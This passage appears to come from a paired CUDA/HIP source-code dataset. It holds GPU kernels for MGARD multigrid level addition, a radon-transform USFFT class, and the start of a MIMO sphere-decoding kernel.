lddwork1, int lddwork2, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z; int y0 = blockIdx.y * blockDim.y + threadIdx.y; int x0 = blockIdx.x * blockDim.x + threadIdx.x; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x) { int z_strided = z * row_stride; int y_strided = y * col_stride; int x_strided = x * fib_stride; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); hipLaunchKernelGGL(( _add_level_cpt), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nr, nc, nf, row_stride, col_stride, fib_stride, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); } // namespace mgard_cuda
4ab851abb27096ef78bfca72cbbab9c925e57b7a.cu
#include "cuda/mgard_cuda_add_level.h" #include "cuda/mgard_cuda_common_internal.h" namespace mgard_cuda { template <typename T> __global__ void _add_level(int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *irow, int *icol, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { int r = irow[y]; int c = icol[x]; dv[get_idx(lddv, r, c)] += dwork[get_idx(lddwork, r, c)]; } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); _add_level<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nrow, ncol, nr, nc, row_stride, col_stride, dirow, dicol, dv, lddv, dwork, lddwork); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { dv[get_idx(lddv, y, x)] += dwork[get_idx(lddwork, y, x)]; } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); _add_level_cpt<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nr, nc, row_stride, col_stride, dv, lddv, dwork, lddwork); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int row_stride, int col_stride, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int row_stride, int col_stride, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level(int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *irow, int *icol, int *ifib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z * row_stride; int y0 = blockIdx.y * blockDim.y + threadIdx.y * col_stride; int x0 = blockIdx.x * blockDim.x + threadIdx.x * fib_stride; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z * row_stride) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y * col_stride) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x * fib_stride) { int z_strided = irow[z]; int y_strided = icol[y]; int x_strided = ifib[x]; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); _add_level<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nrow, ncol, nfib, nr, nc, nf, row_stride, col_stride, fib_stride, dirow, dicol, difib, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z; int y0 = blockIdx.y * blockDim.y + threadIdx.y; int x0 = blockIdx.x * blockDim.x + threadIdx.x; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x) { int z_strided = z * row_stride; int y_strided = y * col_stride; int x_strided = x * fib_stride; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); _add_level_cpt<<<blockPerGrid, threadsPerBlock, 0, *(cudaStream_t *)handle.get(queue_idx)>>>( nr, nc, nf, row_stride, col_stride, fib_stride, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(cudaGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(cudaDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, float *dv, int lddv1, int lddv2, float *dwork, int lddwork1, int lddwork2, int queue_idx); } // namespace mgard_cuda
45ddbcdf303fa2023fe4653d5bbfbbe3dc710cce.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "radonusfft.cuh" #include "kernels_hip.cuh" #include <stdio.h> radonusfft::radonusfft(size_t ntheta, size_t pnz, size_t n, float center, size_t theta_) : ntheta(ntheta), pnz(pnz), n(n), center(center) { float eps = 1e-3; mu = -log(eps) / (2 * n * n); m = ceil(2 * n * 1 / PI * sqrt(-mu * log(eps) + (mu * n) * (mu * n) / 4)); hipMalloc((void **)&f, n * n * pnz * sizeof(float2)); hipMalloc((void **)&g, n * ntheta * pnz * sizeof(float2)); hipMalloc((void **)&fde, 2 * n * 2 * n * pnz * sizeof(float2)); hipMalloc((void **)&fdee, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipMalloc((void **)&x, n * ntheta * sizeof(float)); hipMalloc((void **)&y, n * ntheta * sizeof(float)); hipMalloc((void **)&theta, ntheta * sizeof(float)); hipMemcpy(theta, (float *)theta_, ntheta * sizeof(float), hipMemcpyDefault); int ffts[2]; int idist; int odist; int inembed[2]; int onembed[2]; //fft 2d ffts[0] = 2 * n; ffts[1] = 2 * n; idist = 2 * n * 2 * n; odist = (2 * n + 2 * m) * (2 * n + 2 * m); inembed[0] = 2 * n; inembed[1] = 2 * n; onembed[0] = 2 * n + 2 * m; onembed[1] = 2 * n + 2 * m; hipfftPlanMany(&plan2dfwd, 2, ffts, inembed, 1, idist, onembed, 1, odist, HIPFFT_C2C, pnz); hipfftPlanMany(&plan2dadj, 2, ffts, onembed, 1, odist, inembed, 1, idist, HIPFFT_C2C, pnz); //fft 1d ffts[0] = n; idist = n; odist = n; inembed[0] = n; onembed[0] = n; hipfftPlanMany(&plan1d, 1, ffts, inembed, 1, idist, onembed, 1, odist, HIPFFT_C2C, ntheta * pnz); hipMalloc((void **)&shiftfwd, n * sizeof(float2)); hipMalloc((void **)&shiftadj, n * sizeof(float2)); // compute shifts with respect to the rotation center hipLaunchKernelGGL(( takeshift), dim3(ceil(n / 1024.0)), dim3(1024), 0, 0, shiftfwd, -(center - n / 2.0), n); hipLaunchKernelGGL(( takeshift), dim3(ceil(n / 1024.0)), dim3(1024), 0, 0, shiftadj, (center - n / 2.0), n); } // destructor, memory deallocation radonusfft::~radonusfft() { free(); } void radonusfft::free() { if (!is_free) { hipFree(f); hipFree(g); hipFree(fde); hipFree(fdee); hipFree(x); hipFree(y); hipFree(shiftfwd); hipFree(shiftadj); hipfftDestroy(plan2dfwd); hipfftDestroy(plan2dadj); hipfftDestroy(plan1d); is_free = true; } } void radonusfft::fwd(size_t g_, size_t f_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); hipMemcpy(f, (float2 *)f_, n * n * pnz * sizeof(float2), hipMemcpyDefault); hipMemset(fde, 0, 2 * n * 2 * n * pnz * sizeof(float2)); hipMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipLaunchKernelGGL(( circ), dim3(GS3d0), dim3(BS3d), 0, 0, f, 1.0f / n, n, pnz); hipLaunchKernelGGL(( takexy), dim3(GS2d0), dim3(BS2d), 0, 0, x, y, theta, n, ntheta); hipLaunchKernelGGL(( divphi), dim3(GS3d0), dim3(BS3d), 0, 0, fde, f, mu, n, pnz); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d1), dim3(BS3d), 0, 0, fde, 2 * n, pnz); hipfftExecC2C(plan2dfwd, (hipfftComplex *)fde, (hipfftComplex *)&fdee[m + m * (2 * n + 2 * m)], HIPFFT_FORWARD); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, 2 * n + 2 * m, pnz); hipLaunchKernelGGL(( wrap), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, n, pnz, m); hipLaunchKernelGGL(( gather), dim3(GS3d3), dim3(BS3d), 0, 0, g, fdee, x, y, m, mu, n, ntheta, pnz); // shift with respect to given center hipLaunchKernelGGL(( shift), dim3(GS3d3), dim3(BS3d), 0, 0, g, shiftfwd, n, ntheta, pnz); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipfftExecC2C(plan1d, (hipfftComplex *)g, (hipfftComplex *)g, HIPFFT_BACKWARD); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipMemcpy((float2 *)g_, g, n * ntheta * pnz * sizeof(float2), hipMemcpyDefault); } void radonusfft::adj(size_t f_, size_t g_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); hipMemcpy(g, (float2 *)g_, n * ntheta * pnz * sizeof(float2), hipMemcpyDefault); hipMemset(fde, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); hipLaunchKernelGGL(( takexy), dim3(GS2d0), dim3(BS2d), 0, 0, x, y, theta, n, ntheta); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); hipfftExecC2C(plan1d, (hipfftComplex *)g, (hipfftComplex *)g, HIPFFT_FORWARD); hipLaunchKernelGGL(( fftshift1c), dim3(GS3d3), dim3(BS3d), 0, 0, g, n, ntheta, pnz); //applyfilter<<<GS3d3, BS3d>>>(g,n,ntheta,pnz); // shift with respect to given center hipLaunchKernelGGL(( shift), dim3(GS3d3), dim3(BS3d), 0, 0, g, shiftadj, n, ntheta, pnz); hipLaunchKernelGGL(( scatter), dim3(GS3d3), dim3(BS3d), 0, 0, fdee, g, x, y, m, mu, n, ntheta, pnz); hipLaunchKernelGGL(( wrapadj), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, n, pnz, m); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d2), dim3(BS3d), 0, 0, fdee, 2 * n + 2 * m, pnz); hipfftExecC2C(plan2dadj, (hipfftComplex *)&fdee[m + m * (2 * n + 2 * m)], (hipfftComplex *)fde, HIPFFT_BACKWARD); hipLaunchKernelGGL(( fftshiftc), dim3(GS3d1), dim3(BS3d), 0, 0, fde, 2 * n, pnz); hipLaunchKernelGGL(( unpaddivphi), dim3(GS3d0), dim3(BS3d), 0, 0, f, fde, mu, n, pnz); hipLaunchKernelGGL(( circ), dim3(GS3d0), dim3(BS3d), 0, 0, f, 1.0f / n, n, pnz); hipMemcpy((float2 *)f_, f, n * n * pnz * sizeof(float2), hipMemcpyDefault); }
45ddbcdf303fa2023fe4653d5bbfbbe3dc710cce.cu
#include "radonusfft.cuh" #include "kernels.cuh" #include <stdio.h> radonusfft::radonusfft(size_t ntheta, size_t pnz, size_t n, float center, size_t theta_) : ntheta(ntheta), pnz(pnz), n(n), center(center) { float eps = 1e-3; mu = -log(eps) / (2 * n * n); m = ceil(2 * n * 1 / PI * sqrt(-mu * log(eps) + (mu * n) * (mu * n) / 4)); cudaMalloc((void **)&f, n * n * pnz * sizeof(float2)); cudaMalloc((void **)&g, n * ntheta * pnz * sizeof(float2)); cudaMalloc((void **)&fde, 2 * n * 2 * n * pnz * sizeof(float2)); cudaMalloc((void **)&fdee, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); cudaMalloc((void **)&x, n * ntheta * sizeof(float)); cudaMalloc((void **)&y, n * ntheta * sizeof(float)); cudaMalloc((void **)&theta, ntheta * sizeof(float)); cudaMemcpy(theta, (float *)theta_, ntheta * sizeof(float), cudaMemcpyDefault); int ffts[2]; int idist; int odist; int inembed[2]; int onembed[2]; //fft 2d ffts[0] = 2 * n; ffts[1] = 2 * n; idist = 2 * n * 2 * n; odist = (2 * n + 2 * m) * (2 * n + 2 * m); inembed[0] = 2 * n; inembed[1] = 2 * n; onembed[0] = 2 * n + 2 * m; onembed[1] = 2 * n + 2 * m; cufftPlanMany(&plan2dfwd, 2, ffts, inembed, 1, idist, onembed, 1, odist, CUFFT_C2C, pnz); cufftPlanMany(&plan2dadj, 2, ffts, onembed, 1, odist, inembed, 1, idist, CUFFT_C2C, pnz); //fft 1d ffts[0] = n; idist = n; odist = n; inembed[0] = n; onembed[0] = n; cufftPlanMany(&plan1d, 1, ffts, inembed, 1, idist, onembed, 1, odist, CUFFT_C2C, ntheta * pnz); cudaMalloc((void **)&shiftfwd, n * sizeof(float2)); cudaMalloc((void **)&shiftadj, n * sizeof(float2)); // compute shifts with respect to the rotation center takeshift<<<ceil(n / 1024.0), 1024>>>(shiftfwd, -(center - n / 2.0), n); takeshift<<<ceil(n / 1024.0), 1024>>>(shiftadj, (center - n / 2.0), n); } // destructor, memory deallocation radonusfft::~radonusfft() { free(); } void radonusfft::free() { if (!is_free) { cudaFree(f); cudaFree(g); cudaFree(fde); cudaFree(fdee); cudaFree(x); cudaFree(y); cudaFree(shiftfwd); cudaFree(shiftadj); cufftDestroy(plan2dfwd); cufftDestroy(plan2dadj); cufftDestroy(plan1d); is_free = true; } } void radonusfft::fwd(size_t g_, size_t f_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); cudaMemcpy(f, (float2 *)f_, n * n * pnz * sizeof(float2), cudaMemcpyDefault); cudaMemset(fde, 0, 2 * n * 2 * n * pnz * sizeof(float2)); cudaMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); circ<<<GS3d0, BS3d>>>(f, 1.0f / n, n, pnz); takexy<<<GS2d0, BS2d>>>(x, y, theta, n, ntheta); divphi<<<GS3d0, BS3d>>>(fde, f, mu, n, pnz); fftshiftc<<<GS3d1, BS3d>>>(fde, 2 * n, pnz); cufftExecC2C(plan2dfwd, (cufftComplex *)fde, (cufftComplex *)&fdee[m + m * (2 * n + 2 * m)], CUFFT_FORWARD); fftshiftc<<<GS3d2, BS3d>>>(fdee, 2 * n + 2 * m, pnz); wrap<<<GS3d2, BS3d>>>(fdee, n, pnz, m); gather<<<GS3d3, BS3d>>>(g, fdee, x, y, m, mu, n, ntheta, pnz); // shift with respect to given center shift<<<GS3d3, BS3d>>>(g, shiftfwd, n, ntheta, pnz); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); cufftExecC2C(plan1d, (cufftComplex *)g, (cufftComplex *)g, CUFFT_INVERSE); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); cudaMemcpy((float2 *)g_, g, n * ntheta * pnz * sizeof(float2), cudaMemcpyDefault); } void radonusfft::adj(size_t f_, size_t g_) { dim3 BS2d(32, 32); dim3 BS3d(32, 32, 1); dim3 GS2d0(ceil(n / (float)BS2d.x), ceil(ntheta / (float)BS2d.y)); dim3 GS3d0(ceil(n / (float)BS3d.x), ceil(n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d1(ceil(2 * n / (float)BS3d.x), ceil(2 * n / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d2(ceil((2 * n + 2 * m) / (float)BS3d.x), ceil((2 * n + 2 * m) / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); dim3 GS3d3(ceil(n / (float)BS3d.x), ceil(ntheta / (float)BS3d.y), ceil(pnz / (float)BS3d.z)); cudaMemcpy(g, (float2 *)g_, n * ntheta * pnz * sizeof(float2), cudaMemcpyDefault); cudaMemset(fde, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); cudaMemset(fdee, 0, (2 * n + 2 * m) * (2 * n + 2 * m) * pnz * sizeof(float2)); takexy<<<GS2d0, BS2d>>>(x, y, theta, n, ntheta); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); cufftExecC2C(plan1d, (cufftComplex *)g, (cufftComplex *)g, CUFFT_FORWARD); fftshift1c<<<GS3d3, BS3d>>>(g, n, ntheta, pnz); //applyfilter<<<GS3d3, BS3d>>>(g,n,ntheta,pnz); // shift with respect to given center shift<<<GS3d3, BS3d>>>(g, shiftadj, n, ntheta, pnz); scatter<<<GS3d3, BS3d>>>(fdee, g, x, y, m, mu, n, ntheta, pnz); wrapadj<<<GS3d2, BS3d>>>(fdee, n, pnz, m); fftshiftc<<<GS3d2, BS3d>>>(fdee, 2 * n + 2 * m, pnz); cufftExecC2C(plan2dadj, (cufftComplex *)&fdee[m + m * (2 * n + 2 * m)], (cufftComplex *)fde, CUFFT_INVERSE); fftshiftc<<<GS3d1, BS3d>>>(fde, 2 * n, pnz); unpaddivphi<<<GS3d0, BS3d>>>(f, fde, mu, n, pnz); circ<<<GS3d0, BS3d>>>(f, 1.0f / n, n, pnz); cudaMemcpy((float2 *)f_, f, n * n * pnz * sizeof(float2), cudaMemcpyDefault); }
3e8132cbe7e75844f0c390f68c2bb39b08983e2b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* * * Copyright 1993-2012 NVIDIA Corporation. All rights reserved. * * Please refer to the NVIDIA end user license agreement (EULA) associated * with this source code for terms and conditions that govern your use of * this software. Any use, reproduction, disclosure, or distribution of * this software and related documentation outside the terms of the EULA * is strictly prohibited. */ /* * this function implement fixed complexity sphere decoding * INPUT: * y: received signal * H: permuted propagation matrix * M: modulation scheme, (2: BPSK 4: QPSK, 16: 16QAM, 64: 64QAM) * psymbolconstellation: the symbol constellation * OUTPUT: * s: detection result * Eu: Euclidean distance */ #include <stdio.h> #include <stdlib.h> #include<hip/hip_complex.h> #include <string.h> #include<math.h> #include<cuda_runtime.h> #include<cuda.h> #include<rocblas.h> #include<time.h> #include"cu_complex_operation.cuh" #include"common.h" #include<cuda_runtime.h> #include<cuda.h> #include<cudaProfiler.h> #include<hip/hip_runtime_api.h> #include<hip/device_functions.h> #define threadNum 1024 #define blockNum 4 #define stride 1 /* * in this version I applied colesced memory accesss to all the vector and matrix, with all the matrix stored in row major different threads reading one column * with all the matrix stored in column major, different threads reading one row * uitilize consecutive computation power */ __constant__ hipComplex d_R[MATRIX_SIZE*MATRIX_SIZE],d_psymbolconstellation[16],d_constant_shat[MATRIX_SIZE]; __constant__ int d_list[MATRIX_SIZE]; __global__ void FEpath( // hipComplex *d_R, //upper triangular matrix after cholesky factorization // hipComplex *d_constant_shat, //unconstrained estimation of transmitted symbol vector s // hipComplex *s_matrix_share, hipComplex *s_potential_matrix, //the matrix use to store all the solution candidates from all the blocks int *s_sub_index, //full factorial index matrix int rho, int pathNum, // hipComplex *s, //decoding results float *Eu, //Euclidean distance // int pitch_R, //the number of transmit antennas // int pitch_index, //the number of receive antennas // int pitch_p, int M, //modulation scheme // int threadNum, //number of threads // int *d_list, //the permutation list // hipComplex *d_psymbolconstellation, int index ) { //need to consider the resource allocation int tx=blockIdx.x*blockDim.x+threadIdx.x; //if the path number is small we can allocate the kernel into one block so that we can use the shared memory int tid=threadIdx.x; int Nt=MATRIX_SIZE; //allocate shared memory // extern __shared__ hipComplex array[]; error_t error; int count1, count2,count3,count4; __shared__ float d; //the minimum distance unit between the signal constellation, the distance is usually 2d __shared__ hipComplex alpha, beta; alpha.x=1;alpha.y=0; beta.x=0; beta.y=0; // __shared__ hipComplex d_constant_shat[MATRIX_SIZE]; // __shared__ hipComplex d_R[MATRIX_SIZE*MATRIX_SIZE]; __shared__ hipComplex s_temp[threadNum]; // hipComplex s_temp[tid]; // hipComplex Eu_norm_share[tid]; __shared__ hipComplex Eu_norm_share[threadNum]; hipComplex *R_Eu_share=(hipComplex*)malloc(Nt*sizeof(hipComplex)); // if(tid>=0&&tid<MATRIX_SIZE) // { // // for(count1=0;count1<MATRIX_SIZE;count1++) // { // d_R[IDC2D(count1,tid,MATRIX_SIZE)]=d_R[IDC2D(count1,tid,MATRIX_SIZE)]; // } // // // d_constant_shat[tid]=d_constant_shat[tid]; // } // __syncthreads(); Eu[blockNum*threadNum*index+tx]=0; for (count1=Nt-1; count1>=0; count1--) { if (count1<Nt-rho) { s_temp[tid]=d_constant_shat[count1]; #pragma unroll for (count2=count1+1;count2<Nt; count2++) { s_temp[tid]=complex_add(s_temp[tid],complex_mulcom(complex_div(d_R[IDC2D(count1,count2,MATRIX_SIZE)],d_R[IDC2D(count1,count1,MATRIX_SIZE)]),(complex_sub(d_constant_shat[count2],s_potential_matrix[IDC2D(count2,(index*blockNum*threadNum+tx),pathNum)])))); } if(M==2) //BPSK { d=sqrt(float(float(1)/float(Nt))); if(s_temp[tid].x>0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } } else if(M==4) //QPSK { int *result=(int*)malloc(sizeof(int)); memset(result,0,sizeof(int)); float *distance=(float*)malloc(M*sizeof(float)); memset(distance,0,M*sizeof(int)); d=sqrt(float(float(1)/float(Nt))); for(count2=0;count2<M;count2++) { 